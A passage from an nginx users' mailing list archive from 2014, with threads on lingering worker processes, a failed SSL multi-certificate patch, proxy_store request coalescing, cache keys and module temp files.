S 10:26 > 0:01 nginx: worker process is shutting down nginx 10132 0.2 > 0.2 74776 22280 ? S 10:53 0:47 nginx: worker process > is shutting down nginx 10133 0.0 0.2 71484 18972 ? S > 10:53 0:09 nginx: worker process is shutting down nginx 13690 > 0.2 0.2 72876 20296 ? S 14:22 0:10 nginx: worker > process nginx 13691 0.1 0.2 71492 19088 ? S 14:22 > 0:07 nginx: worker process nginx 13692 0.0 0.0 57292 3180 ? > S 14:22 0:00 nginx: cache manager process root 29863 0.0 > 0.0 57292 4048 ? Ss Sep11 0:00 nginx: master process > /usr/sbin/nginx -c /etc/nginx/nginx.conf nginx 30956 0.0 0.2 > 72924 20336 ? S Sep18 0:23 nginx: worker process is > shutting down [/code] > > Looking for our user's usage, this workers will stay online for > more few hours :) > > The difference between old and new configuration is just a "down" > flag in one of our servers from our websockets pool (upstream). You > can see a simplified version of config on: > http://pastebin.com/02GQQ22r > > Really thanks for your attention. > > Igor > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,221591,253431#msg-253431 > > _______________________________________________ nginx mailing list > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.17 (MingW32) iQEcBAEBAgAGBQJUHTiSAAoJEF1+odKB6YIxL7UIAIJjD+FR81E+mFEMNY1YY/5z 5R+8ZX7StDVUMRbCsT6VRY0Z7GRP7rPuAZasQtRM47lQ3nbE9rarFymB4CNmzZYt H3j/qgiJ7Hwq+geMeGez9dXLoFll9/mKJ9op+dvAqL+SSto0fbcOTFWxKF0ycfxb /MdQ/caJhF+ZuITW+qOcM7Clo7lUU1VZ6To0VVQNfbJZFiuC78D+P6PHGZDMzB4m 8zuxyDIbHJTev6XKLv+hZRlG7fgyM09FwH0SACxcsRKr3XF1dsKQE2OBF0bY8oia nAiW6K0jX9tatOkm+Vj47MF0R37A0L4y86ChGYW2DZsB2Fc6HxLAQ0VBza2HvgU= =Fkjc -----END PGP SIGNATURE----- From shmick at riseup.net Sat Sep 20 15:41:13 2014 From: shmick at riseup.net (shmick at riseup.net) Date: Sun, 21 Sep 2014 01:41:13 +1000 Subject: Fwd: Re: [PATCH] RSA+DSA+ECC bundles In-Reply-To: <541C42D9.2000207@comodo.com> References: <5272D269.20203@comodo.com> <541C3B2B.1050002@comodo.com> <541C3F92.1060409@riseup.net> <541C42D9.2000207@comodo.com> Message-ID: <541DA019.6090000@riseup.net> unfortunately this was as far as i got with version git $ patch -p0 < nginx_multiple_certs_and_stapling_V2.patch patching file a/src/event/ngx_event_openssl.c Hunk #1 succeeded at 96 with fuzz 2 (offset 12 lines). Hunk #2 succeeded at 162 (offset 14 lines). Hunk #3 FAILED at 191. Hunk #4 FAILED at 236. 2 out of 4 hunks FAILED -- saving rejects to file a/src/event/ngx_event_openssl.c.rej patching file a/src/event/ngx_event_openssl.h Hunk #1 FAILED at 104. Hunk #2 succeeded at 203 (offset 22 lines). 1 out of 2 hunks FAILED -- saving rejects to file a/src/event/ngx_event_openssl.h.rej patching file a/src/event/ngx_event_openssl_stapling.c Hunk #1 FAILED at 11. Hunk #12 succeeded at 1793 (offset 13 lines). 1 out of 12 hunks FAILED -- saving rejects to file a/src/event/ngx_event_openssl_stapling.c.rej patching file a/src/http/modules/ngx_http_ssl_module.c Hunk #1 FAILED at 66. Hunk #2 succeeded at 209 (offset 31 lines). Hunk #3 FAILED at 404. Hunk #4 FAILED at 463. Hunk #5 FAILED at 550. Hunk #6 succeeded at 702 (offset 110 lines). Hunk #7 succeeded at 762 (offset 118 lines). 4 out of 7 hunks FAILED -- saving rejects to file a/src/http/modules/ngx_http_ssl_module.c.rej patching file a/src/http/modules/ngx_http_ssl_module.h Hunk #1 FAILED at 25. 1 out of 1 hunk FAILED -- saving rejects to file a/src/http/modules/ngx_http_ssl_module.h.rej patching file a/src/mail/ngx_mail_ssl_module.c Hunk #1 FAILED at 57. Hunk #2 FAILED at 173. Hunk #3 FAILED at 215. Hunk #4 FAILED at 243. 4 out of 4 hunks FAILED -- saving rejects to file a/src/mail/ngx_mail_ssl_module.c.rej patching file a/src/mail/ngx_mail_ssl_module.h Hunk #1 FAILED at 27. 1 out of 1 hunk FAILED -- saving rejects to file a/src/mail/ngx_mail_ssl_module.h.rej and this was as far as i got with version 1.6.2 just renaming dirs beyond that its all greek to me ... $ patch -p0 < nginx_multiple_certs_and_stapling_V2.patch patching file nginx-1.6.2/src/event/ngx_event_openssl.c Hunk #1 succeeded at 86 with fuzz 2 (offset 2 lines). Hunk #2 succeeded at 150 (offset 2 lines). Hunk #3 FAILED at 191. Hunk #4 succeeded at 240 (offset 4 lines). 1 out of 4 hunks FAILED -- saving rejects to file nginx-1.6.2/src/event/ngx_event_openssl.c.rej patching file nginx-1.6.2/src/event/ngx_event_openssl.h Hunk #1 succeeded at 108 (offset 4 lines). Hunk #2 succeeded at 191 (offset 6 lines). patching file nginx-1.6.2/src/event/ngx_event_openssl_stapling.c Hunk #1 FAILED at 11. Hunk #12 succeeded at 1791 (offset 11 lines). 1 out of 12 hunks FAILED -- saving rejects to file nginx-1.6.2/src/event/ngx_event_openssl_stapling.c.rej patching file nginx-1.6.2/src/http/modules/ngx_http_ssl_module.c Hunk #1 succeeded at 74 (offset 8 lines). Hunk #2 succeeded at 200 (offset 22 lines). Hunk #3 FAILED at 404. Hunk #4 FAILED at 463. Hunk #5 succeeded at 640 (offset 90 lines). Hunk #6 succeeded at 677 (offset 92 lines). Hunk #7 succeeded at 737 (offset 100 lines). 2 out of 7 hunks FAILED -- saving rejects to file nginx-1.6.2/src/http/modules/ngx_http_ssl_module.c.rej patching file nginx-1.6.2/src/http/modules/ngx_http_ssl_module.h Hunk #1 FAILED at 25. 1 out of 1 hunk FAILED -- saving rejects to file nginx-1.6.2/src/http/modules/ngx_http_ssl_module.h.rej patching file nginx-1.6.2/src/mail/ngx_mail_ssl_module.c Hunk #2 FAILED at 173. Hunk #3 succeeded at 223 (offset 8 lines). Hunk #4 succeeded at 253 (offset 8 lines). 1 out of 4 hunks FAILED -- saving rejects to file nginx-1.6.2/src/mail/ngx_mail_ssl_module.c.rej patching file nginx-1.6.2/src/mail/ngx_mail_ssl_module.h Hunk #1 succeeded at 27 with fuzz 1. Rob Stradling wrote: > On 19/09/14 15:37, shmick at riseup.net wrote: >> many thanks for that rob >> >> this in addition to an already successful boring ssl patch could be >> quite exciting if it works ! > > :-) > >> cheers >> >> Rob Stradling wrote: >>> Patch attached. >>> >>> -------- Forwarded Message -------- >>> Subject: Re: [PATCH] RSA+DSA+ECC bundles >>> Date: Thu, 31 Oct 2013 21:58:01 +0000 >>> From: Rob Stradling >>> Reply-To: nginx-devel at nginx.org >>> To: nginx-devel at nginx.org >>> >>> On 31/10/13 20:58, Rob Stradling wrote: >>>> On 24/10/13 01:26, Maxim Dounin wrote: >>>> >>>>> As for multiple certs per se, I don't think it should be limited >>>>> to recent OpenSSL versions only. As far as I can tell, current >>>>> versions of OpenSSL will work just fine (well, mostly) as long as >>>>> both ECDSA and RSA certs use the same certificate chain. I >>>>> believe at least some CAs issue ECDSA certs this way, and this >>>>> should work. >>>>> >>>>> Limiting support for multiple certs with separate certificate >>>>> chains to only recent OpenSSL versions seems reasonable for me, >>>>> but if Rob wants to try to make it work with older versions - I >>>>> don't really object. If it won't be too hacky it might worth >>>>> supporting. >>>> >>>> Updated patch attached. This implements multiple certs and makes OCSP >>>> Stapling work correctly with them. It works with all of the active >>>> OpenSSL branches (including 0_9_8). >>> >>> That patch caused problems with ssl_stapling_file. Fixed in the >>> attached V2 patch. >>> >>>> I'm afraid it's a much larger patch than I anticipated it would be when >>>> I started working on it! >>>> >>>> Maxim, does this patch look commit-able? >>> >> > From nginx-forum at nginx.us Sat Sep 20 19:38:26 2014 From: nginx-forum at nginx.us (jediknight) Date: Sat, 20 Sep 2014 15:38:26 -0400 Subject: nginx chunked transfer encoding, cannot get it to work In-Reply-To: <20140915133623.GM59236@mdounin.ru> References: <20140915133623.GM59236@mdounin.ru> Message-ID: <9c546a4789d4a8d3e967b285a29bef38.NginxMailingListEnglish@forum.nginx.org> Is unbuffered upload going to be implemented for SPDY as well? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253246,253441#msg-253441 From shahzaib.cb at gmail.com Sun Sep 21 09:05:09 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Sun, 21 Sep 2014 14:05:09 +0500 Subject: Forward single request to upstream server via proxy_store !! Message-ID: Hi, When the multiple users request for same file on edge server via proxy_store and requested file is still not downloaded on the edge server, the nginx keeps on proxying those requests towards the origin server due to which network port is getting saturated on the edge server and file downloading taking 1~2hours. Is there a way that nginx would forward the only single request towards the origin server and download the requested file while holding back the other users and only serve them when the file is successfully downloaded on the edge server ? This way Incoming port(nload) on edge server will not be saturated !! Regards. Shahzaib -------------- next part -------------- An HTML attachment was scrubbed... URL: From r_o_l_a_n_d at hotmail.com Sun Sep 21 13:40:00 2014 From: r_o_l_a_n_d at hotmail.com (Roland RoLaNd) Date: Sun, 21 Sep 2014 16:40:00 +0300 Subject: trouble changing uri to query string In-Reply-To: <20140917071707.GE3771@daoine.org> References: , <20140917071707.GE3771@daoine.org> Message-ID: Thank you Francis for your response and excuse the late reply.Using map is cool idea, though i have around 2000 possible imageId and size and more than 9 million user id.. they're always imageIDs are prone to change, wouldn't that mean i have to add them manually every time ? On another note, let's say i mapped all wanted cache keys, how can i force the incoming requests to match with that key ? as i would be stuck with the same dilemma as now, since the uri as it's missing the "?" isn't treating the arguments as query string but part of the uri itself... i am currently researching a way to do the following: location ~* /some/path/rest/v2/if ^/giveit.view* set $URI http://mysite.com/some/path/rest/v2/giveit.view?(whatever matched after view)set $args $args_id$arg_sizeset $cache_key $scheme$host$uri$is_args$args; This would only work if the $args reads from the previously set $URI this is obviously a pseudo code, but i'm hoping i'm on the right path here... > Date: Wed, 17 Sep 2014 08:17:07 +0100 > From: francis at daoine.org > To: nginx at nginx.org > Subject: Re: trouble changing uri to query string > > On Mon, Sep 15, 2014 at 02:57:34PM +0300, Roland RoLaNd wrote: > > Hi there, > > this is all untested by me... > > > i have a url looking as such: mysite.com/some/path/rest/v2/giveit.view&user=282&imageid=23&size=80 > > > > i want the cache key to match imageid=23&size=80 without the "user" part. > > You could try using "map" to define a variable which is 'the url without > the part that matches "user=[0-9]+&"', and then use that in the cache > key, perhaps? > > > $args isn't matching because incoming url lacks the "?" part, so $uri is detected as mysite.com/some/path/rest/v2/giveit.view&imageid=23&size=80 > > $url probably starts with the character "/". > > > Is there a way i could force nginx to detect that query string, or rewrite/set the args on each request ? > > There is no query string. > > You may find it easier to switch to "standard" http/cgi-like urls. But > that's a separate thing. > > f > -- > Francis Daly francis at daoine.org > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From jjohnson at smoothlinux.com Sun Sep 21 23:48:06 2014 From: jjohnson at smoothlinux.com (Jason Johnson) Date: Sun, 21 Sep 2014 18:48:06 -0500 Subject: No Cache Header On Proxy Request Message-ID: <541F63B6.9090300@smoothlinux.com> Hi All, Can someone tell me or point me to an example of how to set a no cache header on a proxy request . Currently I have PHP application that I'm reverse proxying to php-fpm. However when I try to post to the login page there being cached by the CDN that I'm using. The no cache header will fix this issue. I have been able to fix this issue on the static pages however I cant seem to get the header working on a proxy request. Thanks, -Jason -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Mon Sep 22 19:06:56 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Tue, 23 Sep 2014 00:06:56 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: Message-ID: Is there any way with nginx that i could put an hold on the subsequent requests and only proxy the single request for same file in order to prevent filling up the tmp folder ? tmp is kept on filling up due to the multiple users are accessing the same file and file is not downloaded yet. On Sun, Sep 21, 2014 at 2:05 PM, shahzaib shahzaib wrote: > Hi, > > When the multiple users request for same file on edge server via > proxy_store and requested file is still not downloaded on the edge server, > the nginx keeps on proxying those requests towards the origin server due to > which network port is getting saturated on the edge server and file > downloading taking 1~2hours. Is there a way that nginx would forward the > only single request towards the origin server and download the requested > file while holding back the other users and only serve them when the file > is successfully downloaded on the edge server ? > > This way Incoming port(nload) on edge server will not be saturated !! > > Regards. > Shahzaib > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Tue Sep 23 03:11:08 2014 From: nginx-forum at nginx.us (linbo) Date: Mon, 22 Sep 2014 23:11:08 -0400 Subject: nginx proxy websocket to multi nodes Message-ID: I use nginx as proxy server, backend are socketio services. Follow the [document](http://socket.io/docs/using-multiple-nodes/) , nginx configuration, ip_hash instruction that indicates the connections will be sticky. upstream socketio { ip_hash; server server1:3000; server server1:3001; server server2:3100; server server2:3101; } But for this configuration, same client request always proxy to same backend server. If want same server request proxy to different backend server, have tried [hash directive](http://nginx.org/en/docs/http/ngx_http_upstream_module.html#hash) but doesn't work upstream socketio { hash "${remote_addr}${remote_port}"; Any solution? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253475,253475#msg-253475 From Hung.Nguyen at ambientdigitalgroup.com Tue Sep 23 08:02:15 2014 From: Hung.Nguyen at ambientdigitalgroup.com (Hung Nguyen) Date: Tue, 23 Sep 2014 08:02:15 +0000 Subject: [nginx module] Save response into temp file Message-ID: <24A98BCB-1D9D-4468-BBAB-53947CE57CF7@ambientdigitalgroup.com> Hi, I am working on an nginx module, that has flow: receive user request -> parse request -> read local file -> process file -> response to client This flow is working well. But now we have another requirement. Afer process this file and build response into ngx_chain, I want to write response content into ngx_temp_file to do another job, after that return response to client receive user request -> parse request -> read local file -> process file -> save the processed file to temp file -> response to client I use this code to write file:=20 ngx_temp_file_t *tf; tf =ngx_pcalloc(r->pool, sizeof (ngx_temp_file_t)); tf->file.fd = NGX_INVALID_FILE; tf->file.log = nlog; tf->path = clcf->client_body_temp_path; tf->pool = r->pool; tf->persistent = 1; rc = ngx_create_temp_file(&tf->file, tf->path, tf->pool, tf->= persistent, tf->clean, tf->access); ngx_write_chain_to_file(&tf->file, m->chain, m->content_length,= r->pool); File can be written into temporary file with following name: -rw------- 1 root root 455712 Sep 23 13:58 0000000001 -rw------- 1 root root 455712 Sep 23 13:58 0000000002 -rw------- 1 root root 2748936 Sep 23 13:58 0000000003 -rw------- 1 root root 2831656 Sep 23 13:58 0000000004 -rw------- 1 root root 2826016 Sep 23 13:58 0000000005 -rw------- 1 root root 1786000 Sep 23 13:58 0000000006 But I cannot read from it. It seems like content of these file is not just = (or not enough) content that user browser receive. Let say If nginx receive user request: http://server.com/document.txt?type=csv , our module will process the original document.txt file, process file to make it csv type, save it to ngx_temp_file, and return to client document.csv file. But the file that was saved into ngx_temp_file is not csv file. Please show me what I am doing wrong on this. Thanks, - Hung -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Tue Sep 23 11:26:41 2014 From: nginx-forum at nginx.us (igorhmm) Date: Tue, 23 Sep 2014 07:26:41 -0400 Subject: Worker processes not shutting down In-Reply-To: <541D3892.5090907@xtremenitro.org> References: <541D3892.5090907@xtremenitro.org> Message-ID: Hi people, @BR: I not found anything on logs related to this problem, but I still investigating and trying to reproduce. @oscaretu: this looks a nice tool, thanks for recommendation @dewanggaba: I'm using the reload command. We can't use restart because this will kill all established connections Thanks for all Posted at Nginx Forum: http://forum.nginx.org/read.php?2,221591,253478#msg-253478 From vbart at nginx.com Tue Sep 23 14:03:16 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 23 Sep 2014 18:03:16 +0400 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: Message-ID: <6086928.qVWrtWDE0h@vbart-workstation> On Tuesday 23 September 2014 00:06:56 shahzaib shahzaib wrote: > Is there any way with nginx that i could put an hold on the subsequent > requests and only proxy the single request for same file in order to > prevent filling up the tmp folder ? tmp is kept on filling up due to the > multiple users are accessing the same file and file is not downloaded yet. > [..] http://nginx.org/r/proxy_cache_lock wbr, Valentin V. Bartenev From shahzaib.cb at gmail.com Tue Sep 23 14:34:23 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Tue, 23 Sep 2014 19:34:23 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: <6086928.qVWrtWDE0h@vbart-workstation> References: <6086928.qVWrtWDE0h@vbart-workstation> Message-ID: @Valentine, is proxy_cache_lock supported with proxy_store ? On Tue, Sep 23, 2014 at 7:03 PM, Valentin V. Bartenev wrote: > On Tuesday 23 September 2014 00:06:56 shahzaib shahzaib wrote: > > Is there any way with nginx that i could put an hold on the subsequent > > requests and only proxy the single request for same file in order to > > prevent filling up the tmp folder ? tmp is kept on filling up due to the > > multiple users are accessing the same file and file is not downloaded > yet. > > > [..] > > http://nginx.org/r/proxy_cache_lock > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Tue Sep 23 16:41:48 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 23 Sep 2014 20:41:48 +0400 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> Message-ID: <2135119.tXnJ49yO9u@vbart-workstation> On Tuesday 23 September 2014 19:34:23 shahzaib shahzaib wrote: > @Valentine, is proxy_cache_lock supported with proxy_store ? No. But if you're asking, then you're using a wrong tool. The proxy_store feature is designed to be very simple and stupid. To meet your needs you should use the proxy_cache directive and its friends. wbr, Valentin V. Bartenev From shahzaib.cb at gmail.com Tue Sep 23 17:24:35 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Tue, 23 Sep 2014 22:24:35 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: <2135119.tXnJ49yO9u@vbart-workstation> References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> Message-ID: But i cannot switch with proxy_cache because we're mirroring the mp4 files for random seeking using mp4 module and proxy_cache doesn't support random seeking. Is there a way i can use bash script with proxy_store ? I want the following logic to prevent duplicate downloads :- 1st user :- client (request the test.mp4) --> nginx (file not existed) --> check if tmp.txt not existed --> create tmp.txt --> download the test.mp4 from origin --> remove tmp.txt 2nd user requesting the same test.mp4 :- client (request test.mp4) --> nginx (file not existed) --> tmp.txt already existed (which means nginx already downloading the file) --> redirect user towards the origin server(keep redirecting users as long as tmp.txt not removed) 3rd user requesting the same test.mp4 :- client (request test.mp4) --> nginx(file existed) --> serve from the cache. SO tmp.txt plays the main role here and prevent the subsequent requests for the same file but i have no idea how to implement it with nginx. Only if someone point me towards right direction. :( Regards. Shahzaib On Tue, Sep 23, 2014 at 9:41 PM, Valentin V. Bartenev wrote: > On Tuesday 23 September 2014 19:34:23 shahzaib shahzaib wrote: > > @Valentine, is proxy_cache_lock supported with proxy_store ? > > No. But if you're asking, then you're using a wrong tool. > The proxy_store feature is designed to be very simple and stupid. > > To meet your needs you should use the proxy_cache directive > and its friends. > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Tue Sep 23 21:42:17 2014 From: r at roze.lv (Reinis Rozitis) Date: Wed, 24 Sep 2014 00:42:17 +0300 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> Message-ID: <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> > But i cannot switch with proxy_cache because we're mirroring the mp4 files > for random seeking using mp4 module and proxy_cache doesn't support random > seeking. Is there a way i can use bash script with proxy_store ? I want > the following logic to prevent duplicate downloads :- You can try to put Varnish ( https://www.varnish-cache.org ) between your proxy_store and content server. It supports request coalescing. p.s. a branch of the 3.x tree and the new 4.x even does have stream support. rr From agentzh at gmail.com Tue Sep 23 22:07:17 2014 From: agentzh at gmail.com (Yichun Zhang (agentzh)) Date: Tue, 23 Sep 2014 15:07:17 -0700 Subject: Worker processes not shutting down In-Reply-To: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> References: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello! On Fri, Sep 19, 2014 at 12:50 PM, igorhmm wrote: > I don't known how to reproduce, not yet :-) > > I couldn't identify which worker was responding too, but I can see with > strace warnings in the old wolker about EAGAIN (Resource temporarily > unavailable). I can see that because old workers still running: > Nginx workers take forever to quit usually because of pending timers. One suggestion is to dump out all the pending timers' handlers so that we can know what parts of nginx are responsible for this. To be more specific, you can traverse through the rbtree rooted at the C global variable "ngx_event_timer_rbtree" and for each tree node, you obtain the ngx_event_t object by doing the pointer arithmetic "((char *) cur - offsetof(ngx_event_t, timer))", then check the function pointed to by "ev->handler" [1]. All these checks can be done in a gdb script or a systemtap script that is inspecting a typical nginx worker pending shutting down. [1] You can take this piece of C code from the ngx_lua module for such an example: https://github.com/openresty/lua-nginx-module/blob/master/src/ngx_http_lua_timer.c#L465 But you need to rewrite it in gdb's python extension language or systemtap's stap scripting language for online dynamic tracing. From nginx-forum at nginx.us Wed Sep 24 06:23:49 2014 From: nginx-forum at nginx.us (bjorntj) Date: Wed, 24 Sep 2014 02:23:49 -0400 Subject: New session id on each request... In-Reply-To: References: Message-ID: <90ec20b584ed5a30d0cb123e0f338d78.NginxMailingListEnglish@forum.nginx.org> No one have any insights on this? BTJ Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253367,253503#msg-253503 From nginx-forum at nginx.us Wed Sep 24 09:03:42 2014 From: nginx-forum at nginx.us (hungnguyen) Date: Wed, 24 Sep 2014 05:03:42 -0400 Subject: [nginx module] Save response into temp file In-Reply-To: <24A98BCB-1D9D-4468-BBAB-53947CE57CF7@ambientdigitalgroup.com> References: <24A98BCB-1D9D-4468-BBAB-53947CE57CF7@ambientdigitalgroup.com> Message-ID: <454ef0b1b4b71e3d16b6de35a17961f5.NginxMailingListEnglish@forum.nginx.org> anyone? Please! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253477,253506#msg-253506 From nginx-forum at nginx.us Wed Sep 24 09:52:56 2014 From: nginx-forum at nginx.us (hagarwal502) Date: Wed, 24 Sep 2014 05:52:56 -0400 Subject: Alternate POST request to nginx failing Message-ID: <38207e4eb3e3c93b34f76e4886f90df5.NginxMailingListEnglish@forum.nginx.org> Hello We are experiencing a strange issue with nginx. If I send multiple POST request to server one after the other, all the alternate POST request fails. I tried debugging the nginx code and found that on every POST request following functions are supposed to be called. Caller function: ngx_epoll_process_events handlers/functions to be called: 1> ngx_event_accept 2> ngx_http_wait_request_handler 3> ngx_http_request_handler However when I make a post request, the first two handlers are invoked and request returns successfully. But the last handler is not invoked. On second request only "ngx_http_request_handler" is invoked and request returns without calling the "http module". I'm yet to dig into further details of nginx code and understand it, but in case you have came through a similar scenario just please let me know of the problem and solution. That would save a lot of my time. Thank you Regards Himanshu Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253507,253507#msg-253507 From vbart at nginx.com Wed Sep 24 10:13:22 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Wed, 24 Sep 2014 14:13:22 +0400 Subject: New session id on each request... In-Reply-To: References: Message-ID: <2122375.s2RKS2njGU@vbart-laptop> On Thursday 18 September 2014 03:40:03 bjorntj wrote: > I have Nginx as a reverse proxy in front of a Tomcat server running a > webapp. > This works ok using Firefox but not Chrome or IE... When using Chrome or IE, > the JSESSIONID gets a new value for each request (instead of keeeping the > same value as it should). > Are there some settings I am missing to fix this? > > (Using Apache it works for all browsers but I want to use Nginx.... :) ) > No, there are no such special settings. You should provide more information to get help. wbr, Valentin V. Bartenev From nginx-forum at nginx.us Wed Sep 24 10:15:35 2014 From: nginx-forum at nginx.us (bjorntj) Date: Wed, 24 Sep 2014 06:15:35 -0400 Subject: New session id on each request... In-Reply-To: <2122375.s2RKS2njGU@vbart-laptop> References: <2122375.s2RKS2njGU@vbart-laptop> Message-ID: <53981a04f156bfe56775f6c62f609bf2.NginxMailingListEnglish@forum.nginx.org> What kind of information is needed? My nginx config? Anything else? BTJ Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253367,253510#msg-253510 From shahzaib.cb at gmail.com Wed Sep 24 11:31:37 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Wed, 24 Sep 2014 16:31:37 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> Message-ID: @RR. could you guide me a bit on it or point me to some guide to start with. I have worked with varnish regarding php caching so i have the basic knowledge of varnish but i am just not getting on how to make it work with proxy_store. :( On Wed, Sep 24, 2014 at 2:42 AM, Reinis Rozitis wrote: > But i cannot switch with proxy_cache because we're mirroring the mp4 files >> for random seeking using mp4 module and proxy_cache doesn't support random >> seeking. Is there a way i can use bash script with proxy_store ? I want the >> following logic to prevent duplicate downloads :- >> > > You can try to put Varnish ( https://www.varnish-cache.org ) between your > proxy_store and content server. It supports request coalescing. > > p.s. a branch of the 3.x tree and the new 4.x even does have stream > support. > > rr > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Wed Sep 24 11:46:30 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Wed, 24 Sep 2014 15:46:30 +0400 Subject: New session id on each request... In-Reply-To: <53981a04f156bfe56775f6c62f609bf2.NginxMailingListEnglish@forum.nginx.org> References: <2122375.s2RKS2njGU@vbart-laptop> <53981a04f156bfe56775f6c62f609bf2.NginxMailingListEnglish@forum.nginx.org> Message-ID: <2445111.bADthjOY0Y@vbart-workstation> On Wednesday 24 September 2014 06:15:35 bjorntj wrote: > What kind of information is needed? My nginx config? Anything else? [..] An output of nginx -V and configuration are minimal information, that someone can give to help in diagnosing any problem. In your case, the first step to identify the cause of the issue should be comparing requests from these browsers. wbr, Valentin V. Bartenev From wandenberg at gmail.com Wed Sep 24 12:33:51 2014 From: wandenberg at gmail.com (Wandenberg Peixoto) Date: Wed, 24 Sep 2014 09:33:51 -0300 Subject: [nginx module] Save response into temp file In-Reply-To: <454ef0b1b4b71e3d16b6de35a17961f5.NginxMailingListEnglish@forum.nginx.org> References: <24A98BCB-1D9D-4468-BBAB-53947CE57CF7@ambientdigitalgroup.com> <454ef0b1b4b71e3d16b6de35a17961f5.NginxMailingListEnglish@forum.nginx.org> Message-ID: As your snippet is very short I cannot be sure but some questions to guide on debugging - did you closed the file when finished to write? some bytes may be in buffer and will be flushed after the close. - the m->chain was used before to write its content to other place? If yes, may be necessary to reset some internal pointers. - what do you mean by "not csv file"? What is the content of 0000000001 file? Regards On Wed, Sep 24, 2014 at 6:03 AM, hungnguyen wrote: > anyone? Please! > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253477,253506#msg-253506 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Wed Sep 24 12:40:02 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 24 Sep 2014 13:40:02 +0100 Subject: Redirect to a different url based on a query. In-Reply-To: References: Message-ID: <20140924124002.GK3771@daoine.org> On Thu, Sep 18, 2014 at 07:34:32PM +0530, Geo P.C. wrote: Hi there, > *We need to redirect only the url wp-login.php?action=lostpassword to other > and all other url including wp-login.php?action=login need to proxypass* Untested, but something like location = /wp-login.php { if ($arg_action = lostpassword) { return 301 http://whatever$request_uri; } proxy_pass wherever; } should probably come close to what you want. You could test "$args = action=lostpassword" if that better describes the requests that you want to handle specially. f -- Francis Daly francis at daoine.org From francis at daoine.org Wed Sep 24 12:50:14 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 24 Sep 2014 13:50:14 +0100 Subject: trouble changing uri to query string In-Reply-To: References: <20140917071707.GE3771@daoine.org> Message-ID: <20140924125014.GL3771@daoine.org> On Sun, Sep 21, 2014 at 04:40:00PM +0300, Roland RoLaNd wrote: Hi there, > Using map is cool idea, though i have around 2000 possible imageId and size and more than 9 million user id.. they're always imageIDs are prone to change, wouldn't that mean i have to add them manually every time ? map can use regex. However, map can only use a single variable, so I think you would need two maps (or perhaps a "set" within an "if") in order to save the request uri without the user part. For example: map $uri $the_bit_before_user { ~(?P.*)&user=[0-9]+& $m; default $uri; } map $uri $the_bit_after_user { ~&user=[0-9]+(?P&.*) $m; default ""; } followed by a later set $request_without_user $the_bit_before_user$the_bit_after_user; could give you a variable that might be useful to use as part of your cache_key. > On another note, let's say i mapped all wanted cache keys, how can i force the incoming requests to match with that key ? as i would be stuck with the same dilemma as now, since the uri as it's missing the "?" isn't treating the arguments as query string but part of the uri itself... There are no arguments. There is no query string. There is only the uri (the location, in this case). Can you describe what you want to happen when a client makes a request of nginx? I imagine it is something like "if nginx has the appropriate response in cache send it; otherwise do something to populate the cache and send the response". But I do not know what you think should populate the cache in the first place. f -- Francis Daly francis at daoine.org From r at roze.lv Wed Sep 24 13:32:39 2014 From: r at roze.lv (Reinis Rozitis) Date: Wed, 24 Sep 2014 16:32:39 +0300 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: 